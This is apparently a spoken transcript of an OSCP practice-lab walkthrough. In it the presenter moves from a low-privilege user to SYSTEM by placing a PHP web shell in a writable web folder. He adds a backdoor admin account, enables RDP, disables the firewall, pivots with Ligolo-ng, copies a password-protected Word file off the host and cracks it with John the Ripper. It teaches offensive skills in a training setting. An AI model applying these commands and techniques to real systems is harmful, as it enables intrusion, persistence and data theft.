go back to our notes, and if we just type in net user, yeah, that's a local user, Stuart and Kevin. So right off the bat, I would start to enumerate and say, MS01, well, how about let's down here, we'll say, we don't need to try this anymore, so that's old. Right now we need to try is enumerate MS01 with winPEAS. Users, and again, I would also save this technically in my, especially for password guessing and password spraying, user spraying, save it in the text file that we have, but I'll also put it here just for quick reference. So we have MS01/Kevin and MS01/Stuart so far. Oh, and look at that, MS01/LAdmin. That's also not a default account. That's interesting, and it's all caps, so it's immediately standing out as something worth noting and investigating, right? Let's go ahead and minimize that. Okay, so we've got our notes, we've added in our users, where we're at, so now let's go ahead and I like to go into public. Again, if you were to look at what tactics and techniques does Darren use, he likes to use the C users public folder for staging. So now we'll go ahead and say certutil. Man, if I could spell URL cache. I'm having a hard time today. And let's go back to our Kali box, 172.16.11.11. Download our, was it winPEAS x64.exe. I'll just call it winPEAS.exe to make my life easier locally. Failed. Okay, status not found. Dang it, somebody misspelled it. So what I'll do is I'll just go back over here, copy, paste, and then actually I guess I technically need to do it here. Paste selection, paste clipboard, and we'll call this winPEAS.exe. Oh, looks like our script is still running, pulling down WinRev, or trying to. So that user interaction still opening up that Word document. We could probably delete that if we want at this point to keep it from recurring. Okay, that's better. Now we downloaded winPEAS successfully. Just for giggles, what was it? C drive, XAMPP, which I think is htdocs. Yep, and there's our uploads folder. So let's go ahead and delete be verbose, XAMPP, htdocs, uploads, star.doc. Of course you didn't like that. Okay, so that should have taken care of that. Tree. Yep, so no more there. Well, let's get the file names actually. I'm having a hard time today. I apologize. Maybe I need a new keyboard. I'm going to blame the keyboard. Okay, so yep, sure enough, our exe is still there, but the .doc files are gone. So we won't have it trying to attempt to run our script anymore. But we can go ahead and run our winPEAS.exe, and I'll let this bake, and we'll start to review the results here momentarily. Okay, so winPEAS is running, but we might as well start to kind of parse through it. I took a quick look while it was running as well, and I didn't see anything immediately jumping out. This looks like it's not having anything immediately of value, so we may have to do some manual enumeration or do some quick searching as well. But I did want to call out that we see here that winPEAS provided some, okay, so the Watson component did work. Take note of these, and again, if you have nothing else, so if we don't find anything, even with manual enumeration, I'll come back to these and start to kind of go through them one at a time. If you've used any of these before and you're like, oh yes, I know what to look for, or I know that this is one I can try very quickly, then give it a shot. But otherwise, I will say for MS01 Priv-esque, Watson findings. So we'll come back to that. And then if we parse through here, look to see if there's any environment variables that stick out. This all looks pretty stock to me. When you've looked at a lot of Windows machines, then you start to be able to more quickly go through and see if there's anything out of the norm, something you haven't seen tons and tons of times. So we see there's lap settings here, so that's interesting. So in the lab, because again, not default, right? What is not normal? What's not typically here? Well, here we're seeing that they have laps running. Laps is the local administrative password service, if I believe. It basically centrally manages all of your local admin accounts. So this might be a fantastic way for, in this case, maybe not Priv-esque, because we don't have any admin accounts or even any Active Directory accounts yet, but this might be something that'll help us out later, you know, maybe for lateral movement. So I would say, again, that's not normal. So make a note to say, in this case, maybe I will just say notes. You can think of it as general notes. We found MS01 has laps. Okay, so LSA protection, credential guard, so cached logons are there, so okay, but we can't do anything with cached logons until we get admin access to see if we can dump passwords, so that doesn't help us yet. UAC, if you see number 5 here, prompt for non-Windows binaries, okay, that's default, that's not going to help us. No PowerShell history or size or file, nothing there to help us. You know, again, as the currently logged on user, C drive, D drive, okay, nothing special there. Hey, it's part of a domain, nothing special there. So again, I went through this, didn't see anything. Tells you, hey, if we're going to get some password hashes from a network standpoint, it's going to be NTLM v2 from the network. So that'll block us from doing past the hash. Means we could only try and crack the hashes if we get those NTLM v2 hashes. What else do we see? Named pipes, nothing special there. Let's see some events. Users, so this ratifies what we saw in the C drive users folder. There's a Kevin, a local admin, a Stuart. Okay, so local L-admin, I said local admin. L-admin is a local administrator. I kind of said that without even thinking about it, and then realized, wait, there's a local admin, L-admin. So that, again, might be helpful. We need to take note of that. We already put it in our user list. And then Stuart and Kevin are just normal users. So that's nothing special there. So I'm going to kind of skip ahead and say when I looked at this earlier, I didn't find anything standing out. Oh, auto log on is Kevin. Well, that's who we're logged on currently. That's the user that interacted with us. So winPEAS. So I'm going to say we didn't really find anything special. Always spend a lot of time getting used to winPEAS and the output. You'll see there's a ton of data in here, but nothing that's really helping us out. Actually, that's not true. I think there was one item that did stand out. So it was in regards to where we had... Well, I guess let me put it this way. I saw something relating back to the web directory and write access. So that makes me wonder, okay, let's do some searching manually. Let's also do some permissions. One of the first things that I thought of when I saw, hey, there's a web server on here, right? So we have HTTP 192.168.201. It's this file upload. Now we uploaded a file. Our user that's on the machine, logged in Kevin, interacted with that file, the .doc file, and he downloaded it, or he opened it, it downloaded our payload, it executed a reverse shell. We got access as Kevin, but Kevin's just a limited user. There's a web service running on here, right? So that's another potential attack vector by itself. Aside from the front end of attacking what's available to us here, well, now we're on the box. What if we try and attack the back end? I didn't see when I looked through the files, there wasn't any juicy credentials or any juicy files. It seemed very vanilla for a XAMPP, I call it XAMPP server install. But if we go into it, you'll see there's a ton of stuff. Whoops. There's a ton of stuff in here, right? You can also do, and you might notice that there's a passwords.txt. Okay, cool. So let's look at that. Always look at it just to make sure, but you'll notice that this is, and after you've seen a few of them, defaults, right? Not really helping us out here. But what I'm more curious about is, can I abuse the web server and the web permissions? So when we do a dir, we can see a bunch of things. We already know that our web services are in the htdocs. So let's go into htdocs. And I also like to look at the ACLs for the current directory. And what this shows here is that we've got read, NT authority has full permissions, administrator have full permissions, but this is an interesting one. Authenticated users has changed, the C. And this is ID, I believe, is inherited permission. So we're an authenticated user, we're logged on. So can we change things in here? Can we modify stuff? Can we play around with this some more? More importantly, can we add our own code and do things that we want it to do? I don't know, but we can definitely play around and find out. One of the first things you could do is try and, let's say, I don't necessarily want to break anything, but we could try copying a file, for example, and see if that'll allow us write permissions. So we could say copy index.html to index2.html. Oh, what? So by change, that allows us to write files. So now if we look, we have an index2.html. Okay, this is promising because what this means is that now let's say we go up here and we go to, can we read that? Can we execute that? index2.html. Okay, we can. So this means we can generate our own web content from the back end and execute it from the front end. So what's a way that you think might be able to abuse this? I'm thinking web shells. I'm thinking we generate something that can execute code. But, well, wait a minute. If we have a web shell, what's that execution going to run as? I don't know. But we know that we have a service running a web server. We know that when we saw earlier that it's Apache HTTP daemon 2458. So let's find out if maybe we can take advantage of good old Apache. Pardon me. And we know it runs PHP code. So we know it can run some dynamic code here. We just don't know what permissions it's running it as. So the way that we can find that out is by essentially running some commands to look at our services. Now, typically that would be like the SC query is one that we could run, and then we could hunt through. It's going to show a lot here, right? It also doesn't really show us all of the information, like what the user permission is that service is running as. So there's a couple of ways we can do it. Right off the bat, if it was me, to be perfectly candid, I would just create the web shell and then run a command or two in there to find out what permissions I have. It might be running as Kevin, which would mean, we invested a little bit of time and got nowhere. But if it's not running as Kevin, okay, well then now we just moved laterally on the machine. We potentially privest if that user account that it's running as has additional permissions. So I would just create the web shell. But for the sake of showing you and for the sake of, hey, let's do a quick check to see if we want to go down that road, we can use PowerShell to essentially do this in probably the easiest fashion. So here's where I got to practice my PowerShell kung fu. Let's go ahead and see if we can actually open up a interactive.exe. Bypass execution policies. Okay, so we do have PowerShell on here, and we are running it natively and interactively. Let's go ahead and build out our command. So it's going to be a get dash sim instance, and we don't have tab because we're not in an interactive shell, unfortunately, or fully interactive, so we're going to have to type it out. We can't tab it. So let's see if that works actually first. Yep, class name is empty string. Okay, so get sim instance, and we would then do dash what we want, a class name, and I believe in this case Win32 service. We could also do a sim service actually, and that comes back with our services. What I'm looking for is, okay, yep, sure enough, there's our Apache, and it's even running as process ID 2576. So at this point, we could even do get dash service Apache. Oops, was it Apache 2.4? Yep. And sure enough, it shows it there. And I believe it's, okay, is it, oops. Uh-oh, I might have broke it. Oh, there we go. Okay, so, oh, come on. Oh, sure enough, I did break it. Okay, maybe don't run that command then, because you might have just killed your shell. So we're gonna have to run that back over, and since we deleted the Word file, so maybe don't delete the Word file, we're going to need to re-upload it so that we can recompromise that system. So let's go ahead and go back, upload our base64, boom, and then we'll just have to wait for it to run. And in this case, what we're going to do is we're just going to go ahead and create the web shell. So let me show you what we're going to do. So maybe in this case, since I can't remember the command off the top of my head, to show the users that it runs as, let's do split vertically. And if you don't know, you do have a catalog of web shells. It's going to be in user share web shells, and there is PHP, and in there one of the easiest ones we can use is the simple backdoor. So if we cat that, this is all we need, and we can essentially copy this over or download it once we get access back to our machine. So I'm going to go ahead and pause the recording, and since we already have our web server staged and it's running, stage. So I'm going to go ahead and copy this file over. So we'll just say copy user share web shells PHP simple to desktop AD staging stage. Okay, so we can grab that after we get re-established on our backdoor. So I'm going to go ahead and pause the recording until our web shell restores or returns. Okay, and we're back and we have connectivity once again. So let's go ahead and shift over to here, and let's go ahead and delete index 2. We don't need that anymore. But what we do want to do is download (16.11.11) our web shell. So it's going to be slash, what was it, simple backdoor.php, and we'll call it simple.php. Ooh, completed successfully. I love it when you complete successfully. So now we should be able to go to simple.php and have a web shell. Ooh, gives me shivers. So simple PHP, boom. So here it tells us the usage, which means this thing is working. So a couple ways we can do it. We can either do here where it's going to be question mark. You can see the syntax, CMD equals what we want it to do, and you'll have to use plus as a mechanism to concatenate or put spaces in there. So we could say question mark CMD equals who am I? Who am I? Yes, that is exactly what we wanted to see. We are gonna we have just elevated privileges from Kevin, a normal user on MS01, to NT authority system. We are, I mean, we're system. We are root. We are commander of all on MS01. So this is exactly what we needed. There's a few ways we can take advantage of this and abuse it. I would say probably the easiest is going to be to actually just run our backdoor again, but to run it as NT authority. So keeping things very simple. We know, well, we have a pretty good idea. So if we just run dir, right, it'll say, here's your documents. And by the way, you can do all of this in curl as well, right? So we could say curl 192.168.100. Instead of upload.php, though, now it would be simple.php. And you see it comes back with our usage. And so we could then say question mark CMD equals dir. And look, it's just like having direct access to the machine. It gives us the current directory. So then we could say, I don't know, dir plus, right? Because we're going to have that space, uploads. and sure enough, it shows us the directory for the uploads. So what I would like to do at this point is we can disconnect from, right now, see we're logged on as Kevin. Let's go ahead and run our listener again, but in this case, we're going to change our curl command from asking about a directory to running. It's going to be uploads / because it's Windows, so not /. And our winrev 443.exe. Oh, I take that back. Maybe I do have it wrong, and we do need to do, is it /? Yeah, /. So that way it escapes. / means escape, and actually give the literal /. So see, another little key thing there. Double backslashes can make a difference. Or if you're not sure if items are getting filtered, try a few different varieties. Try putting it in quotes. Try putting doubles. Try, the few different things that will give you the end result. So sure enough, now who am I? Bam, system authority on MS01. So the next thing I would do typically is go and look for my loot, which I didn't generate here, but if I did, we would say like dir /s/b for / proof.txt, and sure enough, it would come back and say, oh, here it is. It's on the admin desktop as we would expect to find it. Or we could do the same thing for dir /s/b for local.txt. That basically runs the search recursively over the whole operating system for the file name, like local.txt or proof.txt. To give you an example, I could say echo test to, let's say, well, in the current directory, it doesn't really matter where we put it, testing dir.txt. So we can see it there, but we could also see it if I change to /dir, or I could even change to, just to show you, I could be in the users directory, run dir /s/b, and if I give it / testing dir.txt, it'll show me anywhere on the root because it's root. So XAMPP htdocs, doesn't matter where I'm at. Versus if I just ran /s/b with testing dir.txt without that /, it's only going to run it in the users directory and everything beneath it. So just a little hint and a little secret to search across the entire drive pretty quickly to find certain files of interest. But in this case, like I said, I didn't place the loot files in this lab. I feel like that's something that you reward yourself. Definitely do it. In this case, I'm not rewarding myself. You need to keep moving on. But you would find both files now that you're NT authority. And I also like to create a backdoor. So I would say net user /add backdoor password 123. It's completed successfully. Net local group administrators add backdoor. Yay. And see, these are the things that I just like to do to kind of make my life easier, as well as I'll typically go and enable RDP access so I can RDP in, again, just to make my life a little bit easier, as well as I think to give everyone options. Some people feel more comfortable and familiar in the GUI, some feel more familiar in the command line, but I'd say if nothing else, the biggest benefit is you can be multi-threaded when you RDP into the machine, right? We don't have to worry about actual users on here. So if we enable RDP access and then we remote in, well, now we can have multiple command prompts running multiple commands concurrently. We can save the content easier. We can kill sessions that go amok easier without losing our backdoor access. So it just gives you more tools at your disposal, and if that's also where you're comfortable at, it makes you feel more comfortable, which you definitely want when you're going for your OSCP. That being said, I'm going to go ahead and dump in. So I keep these commands at the ready because I don't know them off the back of my hand, as well as, to be perfectly candid, it's just easier to copy and paste than it is to try and type these out, right? You want to work faster, more efficient. So I will dump in the registry entry to turn on RDP, and you'll see there it's enabled successfully. Feel free to type this out if you so please. I'll actually let's say new window. Just for anyone that's curious, you can kind of pause it and take a look. This is the command I'm running to enable RDP. And then I'm going to go ahead and disable the firewall. So that way I can transfer files, move laterally. I just don't have to worry about the firewall getting in the way. There are other options that will essentially just enable RDP access. But again, our purpose isn't to just enable RDP access. Our purpose is to own this box. So I'm just going to turn the firewall completely off. So that's what we did there. So at this point, we've got RDP enabled, and we've also got, here's the command for turning the firewall off. So we turned on RDP, and then we turned off the firewall. So at this point, and we also created our backdoor account. So we should be able to RDP in free of charge at this point, as I like to say. So we'll do xfree RDP, and our victim is 192.168.100.201. Our user is going to be backdoor. Actually, yeah, well, backdoor. Our domain is in this case going to be MS01 because it's not a domain account. And password we created is password123. I will also like to enable the clipboard. So again, make it easier. Copy and paste. And then I believe it's /ignore cert. I think I had it backwards. It might be cert ignore. There we go. So it doesn't prompt for the self-signed certificate. Ooh, another user's logged on. Oh, that's the auto log on. So that's Kevin. Yeah. Sorry, Kevin. We're kicking you out. You get das Boot. And I'll go ahead and just turn these things off. No need to try and send more data and be more noisy. And sure enough, we're logged on as backdoor. And if I want to open up a command prompt as administrator, yes. Who am I? /all. I am root. I have all the privileges. I'm in the admin group. So at this point, we have owned this box. We pilfered our loot. We went and grabbed our proof.txt and local.txt that would have been on here. So now we need to start hunting for Active Directory credentials. All right, that's the next step. So now that we have our admin access to MS01, a couple things we need to do. We still need to, find our Active Directory credentials. They have to be somewhere for us to leverage and get an initial foothold into Active Directory. And the second thing is we need to use this as a pivot point, and we need to build out that pivot point. So in order to do that, if you are familiar and have watched any of my previous sessions and videos or Active Directory labs, well, first of all, thank you. Secondly, you'll know exactly where I'm going to go for pivoting, which if we bring it up here, I'm going to go to good old Google, and I'm going to type in Ligolo-ng, and it looks like it's becoming popular enough that it auto-completes. We'll go to the GitHub repo, releases, and we're going to download the proxy for our Linux machine, so AMD 64, and we're also going to download the agent that we need, for our Windows machine. And as you can see, I got a little click happy there. So the agent will be Windows AMD 64-bit. So let's go ahead and extract both of those. So we'll want to keep our xfree RDP session running. So we'll go ahead and move that over. This session we can go ahead and exit because we don't need that anymore. We are logged on through RDP as backdoor with full admin privileges, but we do need to stage our payloads for lateral movement. So let's go ahead and go back to stage, and let's move over star. Well, let's see, this should be, well, let's just move everything over. We can remove the test2.doc test file, and we can unzip the zip file, and then remove star.zip, license, readme. We'll keep agent, and then we can, was it tar xvf, I believe. Yep, that'll extract our tarball, and we can once again remove license and readme. And we'll go ahead and say move. In this case, our, let's see. So we can go ahead and say move, sudo move force proxy to user sbin. How about just user bin, actually? Okay. So now we can type proxy, yep. And then we're going to go ahead and stage, or actually we already have staged for our agent file, so we'll just go ahead in this case and say, and there's a couple ways we can do this. We can use our web server again, or now that we have the GUI interface for Windows, we can leverage our good old Impacket tools. So I like Impacket SMB server, and we'll do -smb2 support, and we're going to share the current directory, and we're going to call it stage. All right, so that's running. We can go ahead and go back to our Windows machine, Windows Explorer, and go //172.16.11.11, and sure enough, there is, oops, I guess I had a dyslexic moment there. You'll notice that the share was dot. I should have called it the share name stage, and we're going to share the current directory. So you'll notice that the share was dot, so I obviously had that backwards. Now the share is stage, sharing the current directory, so we can go ahead and look at our files here. So we're going to grab agent, copy it, and then go to the C drive, users, public, and we'll just paste it in there, because again, that's where I like to stage a lot of my tools. And let's open up a command prompt. There's our agent file. So now we just need to run the server. So for that, let's go ahead and do actions split vertically. And I'm going to go ahead and run proxy. Actually, you know what? We still need to build all of the components of Ligolo. So if we go back here, you'll notice that the README has the instructions that we need to set this up. So we're going to go ahead and do the IP tap ton tap Kali mode ton, and the device is going to be called Ligolo. Then we need to set it up. And then we can run our proxy. But we're also going to need to route. So we already know what the subnet is that we're going to be routing to, right? It's the, minimize all this, the inside subnet. So I'm going to jump ahead. I know where I'm going, which is 10.10.10. We need to add that to our route table, because if we do route print, oops, or just IP route, you notice that there is no route for the 1010 network. So we need to do, I believe it's also in the guide here. Yep, there it is, sudo IP route add 10.10.10/24 and tell it where to go to get there. So device Ligolo. Okay, now if we do IP route, it shows we have a route entry for the 10.10.1 subnet via the Ligolo device, but currently it's down. We need to get that up and running. So let's run our proxy. So proxy -self cert. All right, so we're listening on all IPs and on port 11601. So we'll go back here. We'll run agent -connect 172.16.11.11 port 11601. Let's add a retry, so in case we get disconnected, and a ignore-cert, I believe it is. I always get this backwards. Yeah, -ignore-cert. Oh, there's a space, not a colon. So it's connect space, then the IP. There we go. And we should see in the background here, boom, there it is, agent joined. Then we'll type session. It'll ask us which session, so we'll type 1 because we want to go into session number 1 here with MS01 as the backdoor account. And we can type ifconfig, and it'll show us the addresses attached to that machine, that victim. So here we see our 10.10.1 subnet. So the last thing we need to do is type start, and that will start the tunnel. So now we have a tunnel that we can route our traffic through. So we've got the route that we already added to Kali. We now have a tunnel to get there. So at this point, I will move this over. Let's go back over here to impact it, and let's just do a quick ping. -C, let's do 2 packets to 10.10.1.200, the domain controller. And sure enough, there we go. The reason I picked the domain controller is because, or the one that we suspected is the domain controller, is because by default, domain controllers will usually have ICMP allowed, as well as a bunch of service ports open. If we try and do the same thing against the other address, 202, yeah, it's not responsive. So it's got the Windows firewall on, which is defaults. So this makes sense. It also immediately narrows down as to which server might be our domain controller, but we can also verify that a few ways. One, we can do the NMAP scan, but a really quick way is odds are it's going to have SMB open. So if we just run crack map exec SMB against 10.10.1.200 without any credentials to try, it'll just profile it, and it immediately comes back with Windows 10 build, which obviously is not accurate. It's a server, but we can see the host name is DC01. Here's the domain, oscp.lab. So we at least can confirm, because thankfully, domain controllers have to have SMB open or do by default. We immediately get a profile and can verify that 200 is DC01, which by using our powers of deduction means 202 is most likely MS02. So let's go ahead and run an NMAP scan against all these ports and see what services we have open on both of these machines. So again, I will typically run my sudo nmap -pn, although it's not as necessary since we know that the domain controller is going to respond. Oh, we should actually get to the right folder. So let's go back. DC01, make dir, because we're going to have our enu, our loot, files, exploits, and then let's go ahead and run nmap. Don't ping, be verbose, run against all the ports, and you know what, let's go ahead and run because we're just going to let this bake, so let's go ahead and run OSCV, so common scripts and version fingerprinting. But we're only going to run against the open ports. So let's reduce the workload and do this as quickly as possible. And then of course let's save it. So NMAP format into enu and nmap-ports.log. Oh, did not respond. Oh, we forgot to give it a target. Duh. Helps to know what you're actually trying to hit. So 10, 10, 1, 200. And there we go. We immediately start to see some ports open. Typical of a domain controller, right? Port 53 for DNS, 445 for SMB, NetBIOS. So we'll go ahead and let that run. Now let's go back to our Windows machine and let's minimize our agent running in the background. And let's start to do some enumeration. So you can manually navigate. The first thing I'm thinking I want to do is check out this Stewart folder because, you know, we didn't see anything. We didn't have access to it before when we were logged on as Kevin, a normal user. So let's go ahead and double click on it. We can manually go through this and look to see, okay, nothing on the desktop. Office templates, so nothing there in the documents. Nothing in downloads, so that we could manually go through that if we wanted. We could also try and do this from the command line, which is going to be a little bit easier. Oh, and actually we want to open up a command prompt with admin privileges. So we have full access. And if we go to the users folder, we can run dir on Stewart, and it's going to give us this list of directories. But what we could also do is that tree command that'll break it into a tree-like structure and show us the subfolders really quickly. So if we do a question mark, you'll see there's F and A as options. F will give us the file names. We definitely want that. So let's go ahead and run that on Stewart. And here, it quickly breaks down and says underneath Stewart, we have the 3D objects, contacts, nothing in there, but desktop has the Microsoft Edge.link, so a shortcut file, which we saw that earlier. We saw the custom office templates, nothing in there. Here we can see there is a search, so maybe let's take a look at that. Let's see if there's anything in the search. So I would say type Stewart searches and then that fancy unique file name there. And we're not really seeing anything of value. This looks like defaults to me. Just one entry, winRT. So that is not helpful. We can also start to look across the entire file system. So one of the first things I'll do, we've enumerated users. So go through the process. For the sake of time, I'm going to skip ahead a little bit, but enumerate the users. Enumerate the permissions on any folders and files that you need to get privilege escalation. At that point, continue to enumerate files. Look at the system environment variables, which we already did earlier with winPEAS. Evaluate the network or network shares. You want to look at things like the PowerShell history. Look for any unique things that are out of place or that are not standard defaults. Let's say we've worked through a lot of that and we're starting to grasp at straws. One of the things that I will lean towards is then doing a full search of the file system for any unique or interesting files. So I'll typically say let's do a dir/s/b, which we've talked about before, helps us scan across recursively across whatever we put in here. And I'll do a /, which is the same as typing c /. We're going to look for anything, so star dot, let's say PDF as an example. And we can see there's some stuff in the recycle bin, but these all look like pretty standard things. Looks like for an install. So like this looks like part of the XAMPP install, things that were deleted afterwards. Nothing really jumping out, nothing unique there. So if I really want, we could go back and look at those and pull those out, but that's not looking helpful. Let's also look for any KeyPass databases, right? So KDBX, do we have any of those? Those would be fantastic because we could definitely, that would that would absolutely be an item of interest that we would want to crack. A KeyPass database, nothing there. How about zip files maybe? Windows apps, Microsoft 3D Viewer, no. That looks like a default, especially because it's in the Windows apps directory. Program files, Windows apps directory. So we're not seeing anything there. Let's take a look and see. Oh, so immediately seeing something jump out to me, which is not standard, which is the fact, and we should have thought about this earlier, right? We've been opening up Word documents on here. Like, that was part of our exploit, as we put that macro in there, which means, duh, it has Office installed. So publish your PowerPoint. So we should start looking for Office files. I would say for like the OSCP setting and just in general, Word, Excel, and PowerPoint tend to be some of the most common ones that you can run across. But you should have a short list of all the different files that you want to look for. So let's do that. Let's start with some Word files. Looks like our scan for the server finished. And here we can see, yeah, DNS, simple DNS, Windows Kerberos, a lot of the domain controller services. Actually, those are all default domain controller services. I'm not seeing anything. I'm not seeing anything special here. This is a stock domain controller port list. So that may not be super helpful. Let's go ahead and do the same thing on our MS02 and see if we get anything. So let's go to MS02, Victor, Enu, loot files exploits, sudo nmap, and in this case we're going to change the IP address to .202. Go ahead and let that bake and run. And let's go back to our Windows machine. So we're not seeing anything there. Yeah, so let's go back to our Office files. How about dir sb /star.doc star, because we can include docx files there. Now we know we're going to get a couple of hits because we have uploaded a few files in here, right? So here's our, test one. Well, that looks like .NET just has doc in there. So we know we're going to get some hits. We're going to have to look through and just say, yeah, that's a false positive, or that's ones that we knew about already because we put them there. Windows side by side. So that's what I would expect from execution of .doc files, which we know the user was doing when they opened up our exploit. Let's see. So that's for, so those are kind of defaults. Here we can see the cache from the user Kevin opening up all of those Word documents, or we're opening up even the same one multiple times. So that's why it's in the iNet cache, just from downloading and then opening those things. Microsoft Office root, that looks defaults. Here's some DLLs. They just happen to have doc in the whole structure. And these are in the program files Office directory, so those look like defaults. But okay, so what? These are not. These are recycle bins, so these are deleted .doc file or files. I'm interested in that, and so here's another thing to look at: 1003. So that's a user SID. If I do whoami /all. Well, right now I'm logged on as backdoor, which is 1005. And these are all of our SIDs. So, okay, so 1003 is either Stuart or Kevin deleted, because it's under the 1003, deleted this file or files. Let's take a look at one of these. So let's actually do dir. Now you're going to want to do dir /A to show everything, and we can paste that, and let's look at everything in this 1003 folder. What all has the 1003 user deleted? Desktop.ini, and then these two .doc files, but one is much bigger than the other. So let's start by looking at this file. So let's do type that and the I8. Oh, okay. So this looks like metadata that tells us that this file was deleted from C users, Stewart, documents, and the file was called welcomeletter.doc. Looks like in a space in the middle here. So this is really helpful information. This already looks somewhat juicy. Why? Well, because it's in the Stewart folder where we didn't find anything earlier. Well, that's because Stewart deleted this file. But he didn't delete it completely. He just deleted it and it ended up in the recycle bin. And the other thing that makes this interesting is that it's a Word doc that's a welcome letter. Welcome letters, that's promising. That is not standard. That is non-default. So odds are, and I'm going to try this real quick. If we say type and we have it type out the other file that has a lot more data, I don't think it's going to be readable. Sure enough, it's not, because it's an actual Word file, so it's actually encoded. But that doesn't mean that we can't use it or access it. What we need to do now is copy it. But where can we open it? Well, odds are we probably won't be able to open it on our Kali box. So worst case, we bring it back over to where we have Office installed, right, on our Windows machine. If we have OpenOffice or LibreOffice installed on Kali, that might work too. But immediately, this looks like it was called welcomeletter.doc. Let's pull this data out. Let's look at this. Let's see what we got. So let's copy this link. And you'll notice that, again, this is under a different user. So if we look at our backdoor user and we open up recycle bin, there's nothing in here and it's empty. But when we're searching through the whole C drive, we are searching in all of everyone's recycle bin when we're doing it from an administrative command prompt. So that's why we're able to find this, even though it's Stewart that deleted it based on the user ID. It doesn't stop us from being able to find it. So this is really important. Don't forget to look in all of the places, including the recycle bin. So let's go ahead and say copy and have that there. And where are we going to copy it to? We'll copy it to the user's public folder. Let's go ahead and drop it in there. So one file copied. If we go into users, public, sure enough, there's the file. I'm going to say view, file name extensions. Let's go ahead and rename it. So this was called welcome letter. Oh, and you know what? We actually have Word installed on our victim machine. So you know what? That's another benefit to having RDP access, is now we can use a GUI application like Microsoft Word and open up this welcome letter directly on the victim. We don't even need to exfil it back to our Kali box. We're just using the native tools on the machine. Oh, crap. Okay. Never mind. We actually are going to need to try and crack this because apparently it's password protected. And it looks like our scan finished for MS02. 5040 is open and 135, and this is unknown. I've seen this before. This actually is not uncommon for Windows machines, but this is looking pretty minimal. There's not a lot of exposure. I feel like I need to rerun that scan because I don't know that we have an attack vector in there. There's only those two ports open. So we're going to rerun that scan. I feel like that might be a false. So in the meantime, we actually do need to exfil this Word document so that we can try and crack this file. Because if we type in, I don't know, let's say Stewart. Nope, not the right password. We're going to need to crack this. So the nice thing about the RDP session that we did is if you remember, we added the option for plus clipboard at the command line. When we said xfree RDP, we added plus clipboard, which means we can right click on this file and say copy in our victim, MS01. We can go over here to our folders, MS01, files, and we can paste. Wait, I'm pretty sure we added the clipboard. Copy. Oh, no. All right. let's reconnect. Yeah, we have plus clipboard. That should allow us to copy and paste back and forth. I will say maybe this is a fluke. Sometimes the demo gods are not always kind. Let's see if we can get logged back in here. Maybe. Uh-oh, lost connection. I think our MS01 box might have crashed. So, because I'm noticing here that our agent died, that is not a good sign, especially because we had that dash retry. So what this means is I'm going to go back to what you would do in the lab. Perfect example is you'd go to your control panel and you would reset this with this machine. I believe you get like 20 or 25 resets, and then you'll have to ask for more. So this would be an example where you would go and use one of those resets. And I believe, unfortunately, depending upon your progress, it resets the entire Active Directory set. I don't think you can reset any individual machine because of all the dependencies. I could be wrong on that, but I'm pretty sure that it says in there that it will reset all of them. So I'm going to go ahead and pause the recording, reset the VM, and we'll come back to it when it's back up. Okay, we are restored. I did have to reboot the box, and as soon as I did, I could reconnect. I ran the same agent command to get our agent going, and sure enough, it showed back up here in Ligolo. So I can do session. In this case, it'll be 2, since it's the second session. Start, and it'll start that tunnel. Get our connectivity back up. We can run our ping command. Well, actually, not against that one, but against 200. And sure enough, yep, we get responses. Okay, so we're back up and running. And again, ideally, maybe we're going to break things again. Let's find out. We should be able to go back here, right click. So I want to right click on the welcome letter, copy, and then try and go back here to our files. Oh, and I still can't paste. Okay. So in this case, we will work around this. The other way is, I believe, we should have SCP. Yes. So a lot of times the newer versions of Windows have SCP built in. If they do, fantastic. Otherwise, we could also use our mpacket tools, which actually, you know what, let's just use mpacket. Well, I take that back. I showed you mpacket earlier. Let's do SCP this time. Get a little variety, right? Look at different tools, have different options, use the ones that make sense for you. So in this case, we would go to the, is it the public directory? Yes, there's our welcome letter. Oh, come on. Be quiet, Windows. You are noisy. And we would do SCP welcome letter .doc, and we would send it to Cali at 172.16.11.11 and colon for the home directory. I believe that's the syntax. We'll find out here. Oh, so connection refused means we're not running the service. So sudo system control start SSH. And let's try that again. There we go. Ask for fingerprint, yes. And type in our super secret password, and sure enough, there we go, 100% transferred. So now we can, let's go back to MS01 files, move, it's in our home directory, welcome letter here. And, you know, I'm just going to change the name here to welcome letter.doc. That way we don't have to worry about the space in there. And then because it's password protected, there's a fantastic program called John the Ripper that we can use to crack this password. So what we'll do is, well, first of all, it doesn't always promise or guarantee it should work. However, if it's on the OSCP exam and you have a password protected Word file, there's a very good chance that you're on the right path and this is what you need to be doing. So we have it. There's a program called Office to John, which if you just type it in, they'll say, hey, give me the file. Okay, cool. Welcome letter. And it's going to dump out that hash. That's the hash for the password that we need to crack. So let's go ahead and save that or export it to welcome letter.doc. I'll just call it .hash. And there it is. And then we can run John. And if you're not familiar, John is fantastic at running these cracks. I'm a big fan of Hashcat, but John the Ripper is absolutely wonderful, and it specifically is intended to work with the output from the Office to John application. So here what we're going to do is let's use a word list. So just looking through here, it would be, there's a few options. It's so many options, right? Let's do grep word list. Okay, so yep, just --w or --word list. So we would run John and then the .hash file with --word list. And what word list are we going to use? Well, if you have been working with the OSCP, the go-to answer is going to be user share word lists RockU. I don't know why I had to think about that for a second. So let's see what this comes back with. Ideally, that should solve the, oh, okay. So it did load the one password hash, old Office, MS Office. So that looks right. It identified the hash properly, and it ran through all of our options in 5 seconds, and we didn't get a hit. What do you do now? Well, we haven't exhausted all of our options. Very similar to Hashcat, John also has the ability to use rules. However, you can't reference a word or a rule file per se. You have to actually build them into the config file of John. There are already some pre-built ones in there, so all you really need to do is just add -r, and it will use the rules. Or I guess it would be --rules. I believe -r does the same thing. We scroll up here. Well, I guess we'll find out here momentarily because it's going to take a lot longer than 5 seconds. So we'll run that. Nope, unknown option. So --rules. So that will now run. It's going to take a lot longer. So ideally we'll get a hit, but if we don't, then this might be a dead end, or it means we don't have the right word list and we need to go and find a better word list. But we don't have anything from our intelligence gathering. There's nothing else on the web page. Maybe we would look through some more files. Maybe we need to add in some usernames like Stuart and Kevin or OSCP. That's not going to be in RockU. But if we run RockU with rules, that should get you a hit. The problem is that this could take a while, right? Only 17% in. So thankfully with RockU rules and a decent machine, again, mine running on a MacBook, it's not going to take too long. It's not going to take hours, but 10 minutes. So I'm going to go ahead and let this continue to run. As you can see, it's onto the B's now, 25%. And then I will resume if we get a hit, or if we don't, then it finishes. But fingers crossed. Okay, so it finished and we did not get a hit. So this is looking a bit disconcerting. You can see it ran for, well, it actually only ran for like 3 minutes. But this is not looking good. So there's a Hail Mary. One last thing that you can do is John has built in brute forcing mechanisms and its own word list. It's a short list, much shorter than RockU. So let's try that. So if you remove all of 